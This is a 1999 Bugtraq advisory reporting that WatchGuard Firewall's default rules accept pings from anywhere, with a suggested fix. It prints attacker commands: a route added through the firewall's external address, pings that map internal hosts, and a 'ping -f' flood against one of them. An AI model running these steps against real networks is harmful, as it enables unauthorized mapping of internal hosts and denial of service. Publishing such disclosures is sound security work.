Date: Thu, 2 Sep 1999 13:15:36 +0200 From: Alfonso Lazaro <altellez@IP6SEGURIDAD.COM> Subject: Default configuration in WatchGuard Firewall To: BUGTRAQ@SECURITYFOCUS.COM I have found a misconfiguration in the default configuration of Watchguard Firewall. By default it appends a rule that it accepts pings from any to any. So if our firebox is defending our internal network ( 192.168.x.x ... ) and our WG Firewall is a proxie with an external ip in internet ( 100.100.100.100 hipotetic ip address ) the atacker can change his/her routes like so : # route add -net 192.168.0.0 netmask 255.255.255.0 gw 100.100.100.100 # ping 192.168.1.1 PING 192.168.1.1 (192.168.1.1): 56 data bytes 64 bytes from 192.168.1.1: icmp_seq=0 ttl=251 time=514.0 ms ^C # ping 192.168.1.2 PING 192.168.1.2 (192.168.1.2): 56 data bytes 64 bytes from 192.168.1.2: icmp_seq=0 ttl=251 time=523.0 ms ^C and so on ... the atacker can now discovers internal network ip and atack them # ping -f 192.168.1.1 Solution is easy ... do not let pings to internal network. -- Saludos. =========================================================== Alfonso Lazaro Tellez altellez@ip6seguridad.com Analista de seguridad IP6Seguridad http://www.ip6seguridad.com Tfno: +34 91-3430245 C\Alberto Alcocer 5, 1 D Fax: +34 91-3430294 Madrid ( SPAIN ) ===========================================================